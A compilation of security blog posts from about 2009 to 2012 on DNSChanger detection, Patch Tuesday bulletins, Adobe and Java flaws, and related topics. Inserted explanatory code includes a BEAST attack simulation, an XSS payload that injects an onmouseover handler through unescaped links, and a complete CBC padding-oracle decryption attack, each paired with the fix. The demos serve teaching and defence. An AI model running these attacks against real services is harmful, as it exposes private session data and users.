
Detecting the DNS Changer Malware

Only a couple of days left until the DNS Changer Working Group stops operating the DNS servers used by the DNS Changer malware. According to the latest stats there are still 300,000 machines infected. These machines will lose Internet access once the servers are shut down.

You can use BrowserCheck to check whether you are in the affected group.

January marked half-time for the folks at the DNS Changer Working Group (DCWG), who are now running the DNS servers originally used by the Rove botnet. Ever since a multi-national task force dismantled the gang in Operation Ghost Click in early November 2011, the DCWG has been in charge of running the servers at the heart of the botnet in order to keep the infected machines that depend on them online. In its four years of existence, Rove managed to infect around four million machines. Its mode of operation is simple: it replaces the DNS servers configured on the infected machine with the attackers' own servers, which lets them resolve almost any name to an address of their choosing and so redirect almost all of the machine's traffic to their own services. This gives the attackers almost unlimited power over the infected machines, since they sit in front of nearly every request made to the Internet. They could, for example, answer download requests for a certain piece of software, say iTunes, with a backdoored version that for all intents and purposes behaves the same but additionally installs a remote administration tool for the attackers. They were also able to reorder search results to influence purchase decisions, and to swap the ads displayed to the user for ones favoring their affiliates.

But the DCWG's mission is time-limited. In November they were tasked with operating the servers for a total of 120 days. They will shut down the servers in March, and anybody who is still using those servers will then lose access to the Internet, as DNS is the service that translates the name of the website you request into its IP address. Once DNS stops working you will get a screen similar to:

Address not valid - Windows Internet Explorer

Fortunately it is relatively easy to verify whether a machine is affected by Rove: all one needs to do is check whether its configured DNS servers fall into the five address ranges that were under the control of the Rove operators. The easiest way to do this, at least under Windows, is to run the Qualys BrowserCheck plug-in, which we recently equipped with Rove detection capabilities (see screenshot).

Qualys BrowserCheck - DNS Changer Malware Detected

If your machine shows as insecure under the DNS Changer heading, you need to perform a few simple steps to correct the situation. Clicking on the FixIt button gives more information on how to correct the DNS servers, but basically you need to reset the DNS servers that you use. On Windows the DNS servers are changed through the Control Panel: click on Start, Control Panel, Network Connections, right-click on the icon that identifies your connection and select Properties, then select Internet Protocol (TCP/IP) and click on the Properties button. This brings you to the screen where the DNS servers are set. Here you should select Obtain DNS server address automatically and then close the windows by pressing OK and Close.

Internet Protocol TCP/IP Properties for Network Connection in Windows XP
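The check described above, as an added example that is not part of the original post and not BrowserCheck's code: it parses the resolver configuration (the output of `ipconfig /all` on Windows, or resolv.conf elsewhere) and tests every configured server against the rogue ranges. The post says there are five ranges but does not list them; the ranges in the code are the ones in the public FBI/DCWG publication and are reproduced from that list as an assumption, so verify them against the publication before relying on the output. The `ipconfig` sample is constructed.

```python
import ipaddress
import re

# Rogue resolver ranges of the DNSChanger (Rove Digital) botnet as published by
# the FBI/DCWG. Reproduced from that public list, not from the post above, which
# only says "five ranges"; verify against the DCWG publication before use.
ROGUE_DNS_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20",   # 85.255.112.0  - 85.255.127.255
    "67.210.0.0/20",     # 67.210.0.0    - 67.210.15.255
    "93.188.160.0/21",   # 93.188.160.0  - 93.188.167.255
    "77.67.83.0/24",     # 77.67.83.0    - 77.67.83.255
    "213.109.64.0/20",   # 213.109.64.0  - 213.109.79.255
    "64.28.176.0/20",    # 64.28.176.0   - 64.28.191.255
)]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"


def parse_dns_servers(text):
    """Return the DNS servers configured in a machine's resolver configuration.

    Accepts the text of `ipconfig /all` (Windows: a "DNS Servers" label followed
    by one address per line) or of /etc/resolv.conf ("nameserver" lines).
    Order is preserved and duplicates are dropped.
    """
    servers = []
    in_dns_block = False
    for line in text.splitlines():
        m = re.match(r"^\s*nameserver\s+(" + IPV4 + r")", line)
        if m:
            servers.append(m.group(1))
            continue
        if re.match(r"^\s*DNS Servers\b", line):
            in_dns_block = True
            m = re.search(r"(" + IPV4 + r")\s*$", line)
            if m:
                servers.append(m.group(1))
            continue
        if in_dns_block:
            # Continuation lines carry a single address (possibly IPv6, which is
            # skipped) and nothing else; the next labelled line ends the block.
            m = re.match(r"^\s+(\S+)\s*$", line)
            if m:
                if re.fullmatch(IPV4, m.group(1)):
                    servers.append(m.group(1))
                continue
            in_dns_block = False
    return list(dict.fromkeys(servers))


def rogue_servers(servers, ranges=ROGUE_DNS_RANGES):
    """Return the subset of `servers` that fall inside the rogue ranges."""
    hits = []
    for s in servers:
        try:
            addr = ipaddress.ip_address(s)
        except ValueError:
            continue
        if any(addr in net for net in ranges):
            hits.append(s)
    return hits


def check_config(text):
    """Parse a resolver configuration; return (all servers, rogue servers)."""
    servers = parse_dns_servers(text)
    return servers, rogue_servers(servers)


# Constructed sample in the layout of `ipconfig /all` on Windows XP: the first
# two resolvers sit inside rogue ranges, the third is the local router.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : example.local
        IP Address. . . . . . . . . . . . : 192.168.1.23
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
        DHCP Server . . . . . . . . . . . : 192.168.1.1
        DNS Servers . . . . . . . . . . . : 85.255.112.47
                                            67.210.3.9
                                            192.168.1.1
        Lease Obtained. . . . . . . . . . : Monday, January 09, 2012 9:12:01 AM
"""

if __name__ == "__main__":
    import subprocess
    import sys
    if sys.platform == "win32":
        text = subprocess.run(["ipconfig", "/all"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_IPCONFIG
    servers, bad = check_config(text)
    print("configured DNS servers:", servers)
    print("rogue (DNSChanger) servers:", bad or "none")
```

Run on a Windows machine it calls `ipconfig /all` itself; elsewhere it runs over the constructed sample. If a machine is clean but its resolvers still land in these ranges, look at the home router: DNSChanger also rewrote the DNS settings of routers that used default credentials, and a DHCP-assigned resolver coming from such a router would keep every machine behind it affected.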

Once done you should register the infection at the FBI’s website, as it will help strengthen the case against Rove’s operators.

January 2012 Patch Tuesday

2012's first Patch Tuesday has seven bulletins, including the bulletin postponed from December 2011 that addresses the BEAST-style information disclosure. Talking about changes in schedule: Microsoft also released bulletin MS11-100 for ASP.NET between Christmas and New Year's 2011, ahead of its originally planned January date, which you might have missed.

Our highest priority is MS12-004, which fixes two vulnerabilities in Windows Media Player: one critical, in MIDI playback, and one important, in the closed caption (CC) interpretation. The vulnerabilities are relatively easy to trigger and require a specially crafted media file. Attacks against these vulnerabilities can come through e-mail or by hosting the media file on a website, and they have the potential to be used in drive-by download attacks.

Next on our list is MS12-005, a vulnerability in the Windows .NET packager that can be triggered through a malicious Microsoft Office Word or PowerPoint document. Microsoft rates it only as 'important', but we consider vulnerabilities that only rely on a user opening a file critical enough to move them up in priority.

MS12-006 is the fix for the BEAST attack mentioned above and should be deployed on all of your web servers. BEAST was first demonstrated at the September 2011 Ekoparty conference in Buenos Aires. It is a chosen-plaintext attack against CBC-mode cipher suites in SSL 3.0 and TLS 1.0 that lets an attacker who can eavesdrop on a connection and inject requests into it recover plaintext, such as session cookies, from HTTPS sessions. If you did miss the MS11-100 release over the holidays, now is a good time to bundle both together. Tools for triggering the hash-collision denial-of-service flaw fixed by MS11-100 are actively being researched and are very simple to build, meaning that they will soon get added to the common DoS tools, maybe even to the one advertised here by Crista (via @mikko).
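The record-layer behaviour BEAST exploits, as an added illustration that is not part of the bulletin or the original post: in SSL 3.0 and TLS 1.0 the CBC chain runs across records, so the IV of the next record is the last ciphertext block of the previous one, which the attacker has already seen. With a chosen prefix in front of the secret (the chosen-boundary trick) and the ability to inject one record of chosen plaintext, each byte of the secret costs at most 256 injected records. The block cipher is replaced by an HMAC-based keyed function (an assumption made for brevity; a real stack uses AES and the attack never needs to decrypt), the padding is a zero-fill stand-in for TLS record padding, and the cookie is constructed.

```python
import hashlib
import hmac
import os

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Stand-in for the record-layer block cipher (AES in a real TLS stack). A
    keyed PRF is enough here because the attacker only compares ciphertext
    blocks and never needs to decrypt."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


class Tls10Connection:
    """Models the SSL 3.0 / TLS 1.0 record layer: the CBC state is carried from
    record to record, so the IV of the next record is the last ciphertext block
    of the previous one. TLS 1.1 fixed this with an explicit per-record IV."""

    def __init__(self, key, initial_iv):
        self.key = key
        self.chain = initial_iv      # secret only for the very first record

    def send(self, plaintext):
        if len(plaintext) % BLOCK:   # stand-in for TLS record padding
            plaintext += b"\x00" * (BLOCK - len(plaintext) % BLOCK)
        out = b""
        for i in range(0, len(plaintext), BLOCK):
            self.chain = block_encrypt(self.key, xor(plaintext[i:i + BLOCK], self.chain))
            out += self.chain
        return out


class Browser:
    """The victim: every request is an attacker-chosen prefix (BEAST used script
    in a page to control the request path) followed by the secret cookie."""

    def __init__(self, conn, secret):
        self.conn, self.secret = conn, secret

    def request(self, prefix):
        return self.conn.send(prefix + self.secret)


def beast_recover(conn, browser, secret_len):
    """The attacker: sees every ciphertext, makes the browser send requests with
    a chosen prefix, and can inject chosen-plaintext records on the same
    connection. Recovers the secret one byte at a time."""
    recovered = b""
    last = browser.request(b"")[-BLOCK:]        # warm-up: observe the chain value
    for i in range(secret_len):
        # Chosen boundary: pick the prefix length so that secret[i] is the last
        # byte of a block whose other 15 bytes are already known.
        prefix = b"A" * (15 - i % BLOCK)
        ct = browser.request(prefix)
        k = i // BLOCK                            # block that holds secret[i]
        c_before = last if k == 0 else ct[(k - 1) * BLOCK:k * BLOCK]
        c_target = ct[k * BLOCK:(k + 1) * BLOCK]
        last = ct[-BLOCK:]
        known = (prefix + recovered)[-15:]
        for g in range(256):
            guess = known + bytes([g])
            # E(probe XOR last) == E(guess XOR c_before), which equals c_target
            # exactly when guess is the real block.
            probe = xor(xor(guess, c_before), last)
            ct2 = conn.send(probe)
            last = ct2[-BLOCK:]
            if ct2[:BLOCK] == c_target:
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; the oracle model is broken")
    return recovered


# Constructed secret: 19 bytes, so recovery has to cross a block boundary.
SECRET = b"Cookie: sid=5e1f3a9"


def run_demo(secret=SECRET):
    """Fresh random key and IV; returns what the attacker recovers."""
    conn = Tls10Connection(os.urandom(32), os.urandom(BLOCK))
    return beast_recover(conn, Browser(conn, secret), len(secret))


if __name__ == "__main__":
    print(run_demo())
```

The fix on the protocol side is the explicit per-record IV of TLS 1.1 and later; the interim mitigations of the time were 1/n-1 record splitting in browsers (which makes the first block of each record unpredictable) and preferring non-CBC suites on servers.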

MS12-001 is the bulletin that was tagged as addressing a 'Security Feature Bypass' flaw. This is a new category, and Microsoft has written a blog post explaining the details involved. In summary: a certain version of Visual C++ (2003 RTM) emitted the SafeSEH metadata in a format that Windows XP, 2003, Vista, Windows 7 and 2008 could not read, so the loader fell back to running the binary without SafeSEH enforcement. Binaries compiled with later versions of Visual C++ (starting with 2003 SP1) are generated correctly, and MS12-001 changes the affected Windows versions to read the older format as well. There is no directly exploitable vulnerability here: an attacker would still have to identify software compiled with the old compiler, find a memory corruption vulnerability in it, and write an exploit that overwrites an SEH handler. Install it when you can, as it is a useful defense-in-depth measure.

Please also take a look at Adobe's release today of new versions of Adobe Reader 9 and X. It covers CVE-2011-4369 for Adobe Reader X, which Adobe had already addressed for Adobe Reader 9 out-of-band on December 16 because of exploits in the wild, and adds a security enhancement that allows for better control of embedded JavaScript.

2011 Year in Review, Trends for 2012

Tony Bradley published yesterday a blog entry that contains a great summary of the top security incidents of 2011. It is worth reading for any IT administrator, as these kinds of attacks will continue to grow in 2012, and if you are like me you may agree that one always learns best from real-life examples.

Tony Bradley, The Security Detail at TechTarget

Adobe Patch for Newest Reader 0-day

Adobe today released a patch for a flaw (CVE-2011-2462) in Adobe Reader 9. The flaw is actively being used in targeted attacks and can be used to take full control of the targeted machine. If you are interested in the technical details, one of the samples has been analyzed in detail by Brandon Dixon and Mila Parkour.

We recommend applying this patch as quickly as possible.

Adobe Reader X contains the same flaw, but the current attack is neutralized by its additional sandbox. While this does not mean that Adobe Reader X users are completely safe, it is a remarkable illustration of the effectiveness of the additional security features that newer products have been enhanced with.

The designers of Google's Chrome browser spent a considerable amount of time on its sandboxing capabilities (see here for an illustrated walk-through of some of the design choices), and it has been quite effective: we do not know of any publicly disclosed attacks against Google's browser at this time.

There is a great technical evaluation of browser security available from Accuvant and, while it was funded by Google, the technical insight it provides is valuable. It is a very enjoyable technical read, written by some of the industry's brightest security engineers. Hopefully you have time to look at it over the holidays.

Fixing Java Vulnerabilities By Industry Collaboration

Malware operators are always looking for new ways to get their programs onto additional machines. Their primary targets are Windows-based machines, because they have the largest install base. However, the operating system itself has become increasingly difficult to attack, so exploit writers have focused their attention on critical vulnerabilities in third-party applications. These third-party vulnerabilities usually require user interaction (browsing to a certain web page, opening an e-mail, playing a media file) to be exploited successfully, but malware operators get high conversion rates by using social engineering techniques and by planting their attacks on trusted websites. While the first wave of these exploits focused on Microsoft Office and the second wave on Adobe Reader and Flash, we are now seeing increased attention on Java. Java has the basic characteristics attackers look for: it is widely installed, it has a set of well-known vulnerabilities, and it has been largely ignored by IT administrators for patching.

Through our BrowserCheck application we have collected data showing that over 80% of all visiting workstations have Java installed. Of these machines, over 40% run a version of Java that has a critical vulnerability, making it the most vulnerable plug-in of all and giving malware an excellent chance to install itself and control the targeted machine.

A possible solution is to include Java in an existing automated update process. It would be ideal if Oracle/Sun could collaborate with Microsoft to use the well established and robust WSUS update process to distribute fixes to Java. If this mechanism could then be extended to all major software vendors, the Internet would become increasingly safer to use for all of us.


Additional September Security Advisories – Update


  • Twitter today fixed an XSS vulnerability that was triggered by hovering over a link on their website. The vulnerability had been fixed some time ago but was unintentionally reintroduced in a recent update. Today it was disclosed again and spread quite quickly. Twitter has more info in their post here.
    Minded Security has an interesting analysis of an additional issue in the JavaScript code involved and shows that finding a valid fix that works across all browsers requires experience and structured QA testing. Mikko Hypponen suggests that Twitter implement a bounty-based program, but the problem seems to lie much lower in the development/testing stack.
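Since the Twitter code itself is not reproduced here, the following added example (constructed for this page, not Twitter's or Minded Security's code) shows the bug class in Python: a link-building routine that copies a URL into an `href` attribute unescaped, beside the escaped version, with a parser-based check for the event-handler attributes a browser would end up honouring. The payload text is constructed and the host `x.example` is a placeholder.

```python
import html
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https?://\S+")


def linkify_vulnerable(text):
    """The bug class: the matched URL is dropped into the href attribute without
    escaping, so a quote inside the URL closes the attribute and whatever
    follows is parsed as further attributes, e.g. an onmouseover handler."""
    return URL_RE.sub(lambda m: '<a href="%s">%s</a>' % (m.group(0), m.group(0)), text)


def linkify_fixed(text):
    """Escape the URL for both contexts it is inserted into (attribute value
    and element text). The regex already limits the scheme to http/https, which
    keeps javascript: URLs out of href."""
    def repl(m):
        safe = html.escape(m.group(0), quote=True)
        return '<a href="%s">%s</a>' % (safe, safe)
    return URL_RE.sub(repl, text)


class EventHandlerFinder(HTMLParser):
    """Reads generated markup the way a browser would and collects every on*
    attribute that ends up on a tag."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name, value))


def find_event_handlers(markup):
    """Return [(tag, attribute, value)] for every event-handler attribute."""
    p = EventHandlerFinder()
    p.feed(markup)
    p.close()
    return p.handlers


# Constructed input in the style of a hover-triggered payload: the quote closes
# href, and an onmouseover attribute rides in behind it.
PAYLOAD_TEXT = 'check this http://x.example/@"onmouseover="alert(1)"/ now'


if __name__ == "__main__":
    for fn in (linkify_vulnerable, linkify_fixed):
        out = fn(PAYLOAD_TEXT)
        print(fn.__name__, find_event_handlers(out) or "no handlers", out, sep="\n  ")
```

The parser-based check is the kind of regression test that would have caught the reintroduction: it asserts on what a browser parses out of the output, not on the string the code intended to produce.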

After last week’s patch Tuesday a few high profile vulnerabilities and patches have appeared this week:

  • Adobe accelerated their patch for the Flash 0-day vulnerability by one week and released it yesterday, Monday September 20. Google Chrome users got the patch through Chrome's update mechanism and received it even earlier, on Friday, September 17. Google Chrome users can also use the Chrome-embedded PDF reader for most of their PDF usage, at least for simple document viewing and printing, and so sidestep the still-unpatched Adobe Reader 0-day.
  • Samba, the popular file-sharing server, issued a patch for a critical vulnerability. It allows remote users to cause a denial-of-service condition and potentially take control of the Samba server. Most users run a version of Samba supplied by their vendor (Red Hat, IBM, Apple etc.) and should get the update from them.
  • An exploit for a vulnerability in the 64-bit Linux kernel was published. The vulnerability allows a local user to take full control of the targeted machine. Limited reports of use of the exploit are coming in, and a tool has been made available to detect infection. Engage your vendor for a patch.
  • Web applications that use Microsoft's are vulnerable to a padding oracle attack against application cookies and other encrypted values, which allows an attacker to decrypt them and gain access to private information. There is a demo video online on YouTube. Microsoft issued security advisory KB2416728 and has acknowledged a limited number of attacks seen in the wild. The advisory contains workarounds that mitigate the information leak by making the application's error responses indistinguishable from each other; web application firewalls with the technology to protect application cookies can also help with the issue.
  • Apple published an update to Mac OS X 10.6 (Snow Leopard) fixing a single issue, which is quite uncommon as they normally bundle many security updates together. Earlier versions of Mac OS X are not affected. QuickTime for Windows was updated as well to address a known 0-day vulnerability.
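The padding oracle attack from the advisory item above, as an added, self-contained demonstration that is not code from the advisory, the demo video or the original post. The server decrypts CBC ciphertext, checks PKCS#7 padding and lets the client distinguish a padding failure from any other outcome; that single bit is enough to decrypt every block, 256 guesses per byte at most. The block cipher is a toy Feistel construction over HMAC-SHA256 standing in for AES (an assumption made to keep the example dependency-free), and the plaintext is a constructed forms-authentication style value. The attack also handles the one classic edge case, a false positive on the last byte caused by an accidental `\x02\x02` ending.

```python
import hashlib, hmac, os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, r, half):
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    """Toy 16-byte block cipher (4-round Feistel over HMAC-SHA256) standing in
    for AES; only its invertibility matters here."""
    L, R = block[:8], block[8:]
    for r in range(4):
        L, R = R, xor(L, _round(key, r, R))
    return L + R

def block_decrypt(key, block):
    L, R = block[:8], block[8:]
    for r in reversed(range(4)):
        L, R = xor(R, _round(key, r, L)), L
    return L + R

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out, prev = out + xor(block_decrypt(key, blk), prev), blk
    return out  # still padded; the caller validates the padding

class PaddingOracle:
    """The vulnerable server: decrypts unauthenticated ciphertext and lets the
    client tell a padding error apart from any other outcome (in the ASP.NET
    case through distinct error responses)."""
    def __init__(self, key):
        self.key, self.queries = key, 0

    def valid(self, iv, ciphertext):
        self.queries += 1
        try:
            pkcs7_unpad(cbc_decrypt(self.key, iv, ciphertext))
            return True
        except ValueError:
            return False

def padding_oracle_attack(oracle, iv, ciphertext):
    """Recover the plaintext of iv||ciphertext using only the oracle. Each block
    is attacked from its last byte backwards: a forged preceding block that
    yields valid padding reveals one byte of the block cipher's output, and XOR
    with the real preceding block turns that into a plaintext byte."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext = b""
    for n in range(1, len(blocks)):
        prev, target = blocks[n - 1], blocks[n]
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned byte by byte
        for pad in range(1, BLOCK + 1):
            j = BLOCK - pad
            for g in range(256):
                forged = bytearray(BLOCK)
                for x in range(j + 1, BLOCK):
                    forged[x] = inter[x] ^ pad  # force the known tail to 'pad'
                forged[j] = g
                if not oracle.valid(bytes(forged), target):
                    continue
                if pad == 1:
                    # Edge case: a hit may also mean ..\x02\x02 (or \x03\x03\x03).
                    # Flipping the byte before the last breaks those patterns
                    # but leaves a genuine trailing \x01 valid.
                    alt = bytearray(forged)
                    alt[j - 1] ^= 0xFF
                    if not oracle.valid(bytes(alt), target):
                        continue
                inter[j] = g ^ pad
                break
            else:
                raise RuntimeError("no valid padding found; not a padding oracle?")
        plaintext += xor(bytes(inter), prev)
    return pkcs7_unpad(plaintext)

# Constructed sample: a forms-authentication style value the server encrypts
# and hands to the client, never expecting the client to read it.
PLAINTEXT = b"userid=1042&role=user&exp=1285600000"

def run_demo(plaintext=PLAINTEXT):
    """Encrypt under a random key, then recover the plaintext through the
    oracle alone. Returns (recovered plaintext, number of oracle queries)."""
    key, iv = os.urandom(32), os.urandom(BLOCK)
    oracle = PaddingOracle(key)
    recovered = padding_oracle_attack(oracle, iv, cbc_encrypt(key, iv, plaintext))
    return recovered, oracle.queries
```

Call `run_demo()` to see the value come back along with the query count. The durable fix is not hiding the error but removing the oracle: authenticate the ciphertext with a MAC and verify it before any decryption or padding check, so a tampered value is rejected identically regardless of what its padding would have decoded to.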

Microsoft issues out of band update for LNK

Microsoft will issue an out-of-band update next Monday, August 2nd. The update addresses the critical LNK vulnerability, which applies to all supported versions of the Windows operating system, from Windows XP SP3 to Windows 7.

Microsoft's decision to issue this update before the normal Patch Tuesday on August 10 is due to reports of an increasing number of attacks that use the LNK flaw.

Windows 2000 and XP SP2 users will not be covered and are now in a predicament that will become increasingly urgent: attacks will continue to become more prevalent and their defensive options are limited. Microsoft's workaround in Advisory KB2286198 has a serious impact on the usability of the system, as desktop icons are all replaced by generic representations and navigation is hampered. The best option for XP SP2 users is to upgrade to SP3 as soon as possible; Windows 2000 users need to migrate to a new OS altogether.

The primary attack vectors for the LNK vulnerability are USB sticks and shared drives; the attack depends on a specially crafted LNK file and a custom DLL to function. Remote attacks through e-mail or websites are theoretically possible but require multiple steps and user interaction. Nevertheless, blocking the SMB and WebDAV protocols in the outbound ruleset of Internet-facing firewalls provides additional protection against the remote attack vector.

CSA Top Threat Report Coming

For the last couple of months we have participated in the Cloud Security Alliance's project "Top Threats to Cloud Computing". A first version will be published at the Cloud Security Alliance Summit during RSA 2010.

Please help us with this effort by completing the Top Threats Survey. The survey takes about 5 minutes to complete and will help us understand whether we are on the right track with the areas covered.

The idea is to present summarized results of this survey at RSA. The project will continue to evolve after the conference as we incorporate your feedback.

Come see the results at the Cloud Security Alliance Summit!

SMB2 – 8 Days From 0-day To Exploit

Security researchers at Immunity have today released an exploit for the SMB2 flaw in Vista/2008, as reported by The Register's Dan Goodin. The code is available under the Canvas Early Updates program; a paid subscription is needed to access it.

The exploit works on all versions of Vista and Windows 2008 with the exception of 2008 R2. Microsoft has described a workaround in this advisory, amounting to turning off SMB2. Implementing this workaround is now becoming critical, as attackers will have access to exploit code soon, in the most optimistic case next week, when HD Moore expects Metasploit to have the exploit implemented.

Firefox browser to check for Flash updates

Yesterday the Mozilla Foundation announced on their security blog that Firefox will start checking for outdated Flash plug-ins. This is a great way of improving the security of web browsers: Flash is often used by attackers to exploit client machines and is unfortunately notoriously difficult to update, requiring (on Windows) different update packages for Internet Explorer and for all other browsers.

Now we just need to convince Hillary Clinton to let the Department of State use Firefox.

Firefox warning to update Adobe Flash

As you can see this worked fine for me on my Mac under Firefox 3.0.14.